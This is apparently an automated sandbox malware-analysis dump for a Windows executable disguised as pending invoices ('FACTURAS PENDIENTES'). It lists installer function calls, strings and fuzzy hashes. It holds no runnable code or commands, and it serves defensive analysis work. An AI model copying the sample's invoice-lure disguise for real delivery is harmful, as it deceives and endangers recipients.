                                    • Part of subcall function 00406D18: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: Char$Next$ItemText$PrevWindow
                                  • String ID: A$C:\Users\user\AppData\Local\Temp\fanin$Call
                                  • API String ID: 4089110348-2013591467
                                  • Opcode ID: 7ee0f7904150dc878aeeec4f98168d1ec89735afe044028777f232ef559c64d1
                                  • Instruction ID: 90192ee12d8343b5cbbbf9dcfc6b809e920884bf694149bd8a4c84d13eeda86d
                                  • Opcode Fuzzy Hash: 7ee0f7904150dc878aeeec4f98168d1ec89735afe044028777f232ef559c64d1
                                  • Instruction Fuzzy Hash: E391B1B1704311ABD720AFA6DD81A6B76A8AF84704F40043FFB45B62D1DB7CD9418B6E
                                  APIs
                                    • Part of subcall function 734712F8: GlobalAlloc.KERNEL32(00000040,?,734711C4,-000000A0), ref: 73471302
                                  • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 7347294E
                                  • lstrcpyW.KERNEL32(00000008,?), ref: 734729A4
                                  • lstrcpyW.KERNEL32(00000808,?), ref: 734729AF
                                  • GlobalFree.KERNEL32(00000000), ref: 734729C0
                                  • GlobalFree.KERNEL32(?), ref: 73472A44
                                  • GlobalFree.KERNEL32(?), ref: 73472A4A
                                  • GlobalFree.KERNEL32(?), ref: 73472A50
                                  • GetModuleHandleW.KERNEL32(00000008), ref: 73472B1A
                                  • LoadLibraryW.KERNEL32(00000008), ref: 73472B2B
                                  • GetProcAddress.KERNEL32(?,?), ref: 73472B82
                                  • lstrlenW.KERNEL32(00000808), ref: 73472B9D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2272058813.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true
                                  Similarity
                                  • API ID: Global$Free$Alloclstrcpy$AddressHandleLibraryLoadModuleProclstrlen
                                  • String ID:
                                  • API String ID: 1042148487-0
                                  • Opcode ID: 34da3a708bdd68606768488eb3c4e4137c7ca334e50fb117c1193af4ef56f34c
                                  • Instruction ID: 6750460e30dce992525df532bb5eaba9793520812dd4d8f0e068ff3be2322e90
                                  • Opcode Fuzzy Hash: 34da3a708bdd68606768488eb3c4e4137c7ca334e50fb117c1193af4ef56f34c
                                  • Instruction Fuzzy Hash: A642BE71A0834ADFD31DCF24C5447AAB7F5FF88310F044A2EE4AAD6294E770D5858B9A
                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402B85
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: FileFindFirst
                                  • String ID:
                                  • API String ID: 1974802433-0
                                  • Opcode ID: aa95f51c6264b43bf771eda4cc7eb5353e28d7212280a1e96ce165172d32d45d
                                  • Instruction ID: 66eca0b878d1a88cf031bc7713e4e99cd100193794d0d0043917bcbbabee6758
                                  • Opcode Fuzzy Hash: aa95f51c6264b43bf771eda4cc7eb5353e28d7212280a1e96ce165172d32d45d
                                  • Instruction Fuzzy Hash: 37D0EC61414150E9D1606F718D49ABA736DAF05354F204A3EF196E10D1EAB85501932F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fcf2038373dac2d3d8319ce80b5227dedc9fd9d207136d333b3d89b18dbcf931
                                  • Instruction ID: d4ac7d1497c90a7860cde27ccfdf49f9d4c0c6eb7f3b7e6fe9b2edbc2c979ebe
                                  • Opcode Fuzzy Hash: fcf2038373dac2d3d8319ce80b5227dedc9fd9d207136d333b3d89b18dbcf931
                                  • Instruction Fuzzy Hash: 79C15B71A0C3918FD364CF29C48036ABBE1FBC5304F10892EE5DA9B391D678A546CB5B
                                  APIs
                                  • CheckDlgButton.USER32(?,?,00000001), ref: 00403E04
                                  • EnableWindow.USER32(?), ref: 00403E11
                                  • GetDlgItem.USER32(?,000003E8), ref: 00403E1D
                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00403E39
                                  • GetSysColor.USER32(?), ref: 00403E4A
                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00403E58
                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00403E66
                                  • lstrlenW.KERNEL32(?), ref: 00403E6C
                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00403E79
                                  • SendMessageW.USER32(00000000,00000449,?,?), ref: 00403E90
                                  • GetDlgItem.USER32(?,0000040A), ref: 00403EEC
                                  • SendMessageW.USER32(00000000), ref: 00403EF3
                                  • EnableWindow.USER32(00000000), ref: 00403F10
                                  • GetDlgItem.USER32(0000004E,000003E8), ref: 00403F34
                                  • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 00403F89
                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00403F9B
                                  • SetCursor.USER32(00000000), ref: 00403FA4
                                    • Part of subcall function 004069CE: ShellExecuteExW.SHELL32(?), ref: 004069DD
                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00403FE6
                                  • SetCursor.USER32(00000000), ref: 00403FE9
                                  • SendMessageW.USER32(00000111,?,00000000), ref: 00404015
                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040402D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: MessageSend$Cursor$Item$EnableLoadWindow$ButtonCheckColorExecuteShelllstrlen
                                  • String ID: Call$N
                                  • API String ID: 3270077613-3438112850
                                  • Opcode ID: 9fe76440a7bbb49420d9e25e1a97e0c0d372ca4686a6a0a345b6597793e48a1e
                                  • Instruction ID: 4fa98256382c23a77b640614663c001b7206c978ba46bfa2c34382a940cfe240
                                  • Opcode Fuzzy Hash: 9fe76440a7bbb49420d9e25e1a97e0c0d372ca4686a6a0a345b6597793e48a1e
                                  • Instruction Fuzzy Hash: A881B0B1604308AFD710AF24DD44A6B7BE9FF88345F41083EF641A72A1CB789945CF59
                                  APIs
                                  • DefWindowProcW.USER32(?,?,?,?), ref: 0040102E
                                  • BeginPaint.USER32(?,?), ref: 0040104C
                                  • GetClientRect.USER32(?,?), ref: 00401062
                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010DF
                                  • FillRect.USER32(00000000,?,00000000), ref: 004010F3
                                  • DeleteObject.GDI32(00000000), ref: 004010FA
                                  • CreateFontIndirectW.GDI32(?), ref: 00401120
                                  • SetBkMode.GDI32(00000000,?), ref: 00401143
                                  • SetTextColor.GDI32(00000000,000000FF), ref: 0040114D
                                  • SelectObject.GDI32(00000000,00000000), ref: 0040115B
                                  • DrawTextW.USER32(00000000,Tolkningen Setup,000000FF,?,00000820), ref: 00401171
                                  • SelectObject.GDI32(00000000,00000000), ref: 00401179
                                  • DeleteObject.GDI32(?), ref: 0040117F
                                  • EndPaint.USER32(?,?), ref: 0040118E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                  • String ID: F$Tolkningen Setup
                                  • API String ID: 941294808-2961945220
                                  • Opcode ID: d731168a47aac58058028b36b6280044d0ca24b31d8de32a1a16c1507812eb21
                                  • Instruction ID: d36771556e1314171d00f7341d5a6d6cd4ef22ea24e197e6f7dda2bcd3f0aae3
                                  • Opcode Fuzzy Hash: d731168a47aac58058028b36b6280044d0ca24b31d8de32a1a16c1507812eb21
                                  • Instruction Fuzzy Hash: 3041AD720083509FC7159F65CE4896BBBE9FF88715F150A2EF9D1A22A0CA34C904CFA6
                                  APIs
                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,?,00406239,?,?), ref: 0040631C
                                  • GetShortPathNameW.KERNEL32(00000000,00426E48,00000400), ref: 00406325
                                  • GetShortPathNameW.KERNEL32(?,00426648,00000400), ref: 00406342
                                  • wsprintfA.USER32 ref: 00406360
                                  • GetFileSize.KERNEL32(00000000,00000000,00426648,C0000000,00000004,00426648,?), ref: 00406398
                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004063A8
                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063D8
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00426248,00000000,-0000000A,00408984,00000000,[Rename],00000000,00000000,00000000), ref: 004063F8
                                  • GlobalFree.KERNEL32(00000000), ref: 0040640A
                                  • CloseHandle.KERNEL32(00000000), ref: 00406411
                                    • Part of subcall function 004068F6: GetFileAttributesW.KERNELBASE(00000003,0040340A,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,80000000,00000003,?,?,?,?,?), ref: 004068FA
                                    • Part of subcall function 004068F6: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040691A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Similarity
                                  • API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                  • String ID: %ls=%ls$HfB$HnB$[Rename]
                                  • API String ID: 2900126502-165592708
                                  • Opcode ID: e7f092b44845e5a987dde1640a7a18ced5189e995c1b7a4531422e6471ba5a07
                                  • Instruction ID: 28d4088f706ad7906ef0a9a5075647bec21de1d5f4d95c1c1de34b852c29caff
                                  • Opcode Fuzzy Hash: e7f092b44845e5a987dde1640a7a18ced5189e995c1b7a4531422e6471ba5a07
                                  • Instruction Fuzzy Hash: 9431E5B12002217BD6206B359D49F7B3A5CDF81748F56443EF942BA2C2DA7DD8624A7C
                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402C09
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402C33
                                  • GlobalFree.KERNEL32(?), ref: 00402C7E
                                  • GlobalFree.KERNEL32(00000000), ref: 00402C94
                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,40000000,00000002,00000000,00000000), ref: 00402CB1
                                  • DeleteFileW.KERNEL32(00000000,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402CC4
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll, xrefs: 00402CD3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll
                                  • API String ID: 2667972263-3542424732
                                  APIs
                                  • CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406D8D
                                  • CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                  • CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DA1
                                  • CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DB9
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406D18, 00406D1A
                                  • *?|<>/":, xrefs: 00406D7C
                                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D1F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Char$Next$Prev
                                  • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                  • API String ID: 589700163-879122614
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                  • String ID:
                                  • API String ID: 2320649405-0
                                  APIs
                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004056CE
                                  • GetMessagePos.USER32 ref: 004056D6
                                  • ScreenToClient.USER32(?,?), ref: 004056F0
                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00405704
                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0040572C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Message$Send$ClientScreen
                                  • String ID: f
                                  • API String ID: 41195575-1993550816
                                  APIs
                                  • SetTimer.USER32(?,?,000000FA,00000000), ref: 00403648
                                  • MulDiv.KERNEL32(000825C8,00000064,000825C8), ref: 00403670
                                  • wsprintfW.USER32 ref: 00403680
                                  • SetWindowTextW.USER32(?,?), ref: 00403690
                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 004036A2
                                  Strings
                                  • verifying installer: %d%%, xrefs: 0040367A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Text$ItemTimerWindowwsprintf
                                  • String ID: verifying installer: %d%%
                                  • API String ID: 1451636040-82062127
                                  APIs
                                    • Part of subcall function 734712F8: GlobalAlloc.KERNEL32(00000040,?,734711C4,-000000A0), ref: 73471302
                                  • GlobalFree.KERNEL32(00000000), ref: 734722F1
                                  • GlobalFree.KERNEL32(00000000), ref: 73472326
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2272058813.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true
                                  • Associated: 00000000.00000002.2272001648.0000000073470000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000000.00000002.2272120564.0000000073474000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000000.00000002.2272201541.0000000073476000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73470000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Global$Free$Alloc
                                  • String ID:
                                  • API String ID: 1780285237-0
                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 7347116B
                                  • GlobalFree.KERNEL32(00000000), ref: 734711AE
                                  • GlobalFree.KERNEL32(00000000), ref: 734711CD
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 734711E6
                                  • GlobalFree.KERNEL32 ref: 7347125C
                                  • GlobalFree.KERNEL32(?), ref: 734712A7
                                  • GlobalFree.KERNEL32(00000000), ref: 734712BF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2272058813.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73470000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Global$Free$Alloc
                                  • String ID:
                                  • API String ID: 1780285237-0
                                  APIs
                                  • GlobalFree.KERNEL32(00000000), ref: 734721BF
                                    • Part of subcall function 734712E1: lstrcpynW.KERNEL32(00000000,?,7347156A,?,734711C4,-000000A0), ref: 734712F1
                                  • GlobalAlloc.KERNEL32(00000040), ref: 7347212C
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 7347214C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2272058813.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73470000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                  • String ID:
                                  • API String ID: 4216380887-0
                                  APIs
                                  • GetDlgItem.USER32(?,?), ref: 00401F03
                                  • GetClientRect.USER32(00000000,?), ref: 00401F4D
                                  • LoadImageW.USER32(00000000,?,00000100,?,?,00000100), ref: 00401F82
                                  • SendMessageW.USER32(00000000,00000172,00000100,00000000), ref: 00401F92
                                  • DeleteObject.GDI32(00000000), ref: 00401FA1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                  • String ID:
                                  • API String ID: 1849352358-0
                                  APIs
                                  • GetDC.USER32 ref: 00401FB9
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401FD0
                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401FD8
                                  • ReleaseDC.USER32(?,00000000), ref: 00401FEB
                                    • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00010480,?,?,?,00000000,?,?), ref: 0040604B
                                  • CreateFontIndirectW.GDI32(0040C8C8), ref: 00402037
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: CapsCreateDeviceFontIndirectReleaselstrcat
                                  • String ID:
                                  • API String ID: 4253744674-0
                                  APIs
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000808,00000000,73472B4C,00000000,00000808), ref: 73471F8C
                                  • GlobalAlloc.KERNEL32(00000040,00000000), ref: 73471F97
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 73471FAB
                                  • GetProcAddress.KERNEL32(?,00000000), ref: 73471FB6
                                  • GlobalFree.KERNEL32(00000000), ref: 73471FBF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2272058813.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73470000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                  • String ID:
                                  • API String ID: 1148316912-0
                                  APIs
                                  • lstrlenW.KERNEL32(004211D0,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF,004211D0,?,?,?,?,?), ref: 004055FA
                                  • wsprintfW.USER32 ref: 00405607
                                  • SetDlgItemTextW.USER32(?,004211D0), ref: 0040561E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: ItemTextlstrlenwsprintf
                                  • String ID: %u.%u%s%s
                                  • API String ID: 3540041739-3551169577
                                  • Opcode ID: 1657763a395a501c771c527054f82eb2be7fb15598214c574ca57117f0c03a97
                                  • Instruction ID: 55cf9957bdbe08eeb8051450228c2b429c3200e40720c4f5a9b0f695fa8f14cf
                                  • Opcode Fuzzy Hash: 1657763a395a501c771c527054f82eb2be7fb15598214c574ca57117f0c03a97
                                  • Instruction Fuzzy Hash: 902106737003142FD720A9799C81FAB7289CBC5364F01473EFE6AF71D1E979581885A5
                                  APIs
                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,?,?,?), ref: 00401E2C
                                  • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00401E48
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: MessageSend$Timeout
                                  • String ID: !
                                  • API String ID: 1777923405-2657877971
                                  • Opcode ID: 717c05464dbdde1d43877d7e05f7376ad78b7270f4b2221d83dfb1c24934849a
                                  • Instruction ID: 49af8de353e46cf11236f791407a5cbcba9ae5af57995df827a2b81b7b260957
                                  • Opcode Fuzzy Hash: 717c05464dbdde1d43877d7e05f7376ad78b7270f4b2221d83dfb1c24934849a
                                  • Instruction Fuzzy Hash: 44212471209301AFE714AF21C846A2FBBE8EF84755F00093FF585A21E0C6B98D01CA5A
                                  APIs
                                  • wsprintfW.USER32 ref: 73471F51
                                  • lstrcpyW.KERNEL32(?,error,00001018,73471765,00000000,?), ref: 73471F71
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2272058813.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true
                                  • Associated: 00000000.00000002.2272001648.0000000073470000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000000.00000002.2272120564.0000000073474000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000000.00000002.2272201541.0000000073476000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73470000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: lstrcpywsprintf
                                  • String ID: callback%d$error
                                  • API String ID: 2408954437-1307476583
                                  • Opcode ID: c70edf638ef40ad2a92b6e1d63cc9bf7b63339d127b02cd7c95c24e083765e37
                                  • Instruction ID: 266daff9c57382279d53ef58d5acbf6249a58419b9a1e866ded5b3b0405c9b47
                                  • Opcode Fuzzy Hash: c70edf638ef40ad2a92b6e1d63cc9bf7b63339d127b02cd7c95c24e083765e37
                                  • Instruction Fuzzy Hash: 82F05835204160AFD30C8B08D948FFA73B9EF89314F1981A8FC5A9B342C770AC418B99
                                  APIs
                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403C9E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406537
                                  • CharPrevW.USER32(?,00000000), ref: 00406542
                                  • lstrcatW.KERNEL32(?,004082B0), ref: 00406554
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406531
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: CharPrevlstrcatlstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 2659869361-823278215
                                  • Opcode ID: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
                                  • Instruction ID: cc5554a2ad12a3b2ce5c355aa705355a4eb5105ff62047e1dcc734cc64aad723
                                  • Opcode Fuzzy Hash: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
                                  • Instruction Fuzzy Hash: B6D05E31102924AFC2026B58AE08D9B77ACFF46301301406EFAC2B3160CB745D5287ED
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2272058813.0000000073471000.00000020.00000001.01000000.00000004.sdmp, Offset: 73470000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73470000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: FreeGlobal$__alldvrm
                                  • String ID:
                                  • API String ID: 482422042-0
                                  • Opcode ID: 5a18ad99abb5c67aab769a9765d9200d5677d663218ee8280ec199a82a9d048d
                                  • Instruction ID: 53ac4e59fc73c23ca58e23a3c40cdad3aec6ad407019952da1e9b38b82f3673f
                                  • Opcode Fuzzy Hash: 5a18ad99abb5c67aab769a9765d9200d5677d663218ee8280ec199a82a9d048d
                                  • Instruction Fuzzy Hash: 115108326143458FD31E9E7589807FA76FAEBC8200B18492DE057D3384E7A1E986869A
                                  APIs
                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll), ref: 004028B9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: lstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsnC132.tmp$C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll
                                  • API String ID: 1659193697-492866800
                                  • Opcode ID: 8dbcb2fd7b217228523bb32d9577dfde9e670be5aaf231835310540875a17a73
                                  • Instruction ID: 87e4a89a1644b821f0af8cb1a7976e90618d12837afc66c1e862d8435416238a
                                  • Opcode Fuzzy Hash: 8dbcb2fd7b217228523bb32d9577dfde9e670be5aaf231835310540875a17a73
                                  • Instruction Fuzzy Hash: C7112676A543006BD310BB618A89A2BB7D4AF84314F11453FF545B31C1D7BC980687AF
                                  APIs
                                    • Part of subcall function 00405D15: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00000000,?,?), ref: 00405D47
                                    • Part of subcall function 00405D15: lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00000000,?,?), ref: 00405D59
                                    • Part of subcall function 00405D15: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00000000,?,?), ref: 00405D74
